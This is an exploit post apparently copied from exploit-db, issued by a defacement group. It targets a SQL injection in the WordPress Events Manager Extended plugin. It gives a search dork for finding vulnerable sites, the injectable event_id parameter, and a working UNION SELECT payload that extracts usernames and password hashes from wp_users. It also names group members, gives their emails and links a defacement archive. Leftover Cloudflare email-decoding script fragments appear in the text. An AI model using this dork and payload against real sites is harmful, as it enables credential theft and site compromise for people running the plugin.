------------------------------------------------------------------------
| # WordPress Events Manager Extended Plugin Persistent SQL Vulnerability |
| ------------------------------------------------------------------------ |
| # SoftwareLink: http://wordpress.org/extend/plugins/events-manager-extended/ |
| ------------------------------------------------------------------------ |
| [-] Dork ; inurl:wp-admin/admin.php?page= |
| [-] Vulnerable File ; /wp-admin/admin.php?page=people&action=printable&event_id=[SQL] |
| [-] Exploit ; -1+union+select+0,1,2,concat_ws(user_login,0x3a,user_pass)UAHCrew,4+from+wp_users-- |
| ------------------------------------------------------------------------ |
| # UAHCrew Member : Hackeri-AL - LoocK3D - b4cKd00r ~ |
| # Deface Archive : http://zone-h.org/archive/notifier=UAH-Crew |
| # UAHCrew : uahcrew@yahoo.com<script type="text/javascript"> |
| (function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); |
| # LoocK3D : locked.ks@gmail.com<script type="text/javascript"> |
| (function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); |
</script>
Fonte: http://www.exploit-db.com/exploits/17386/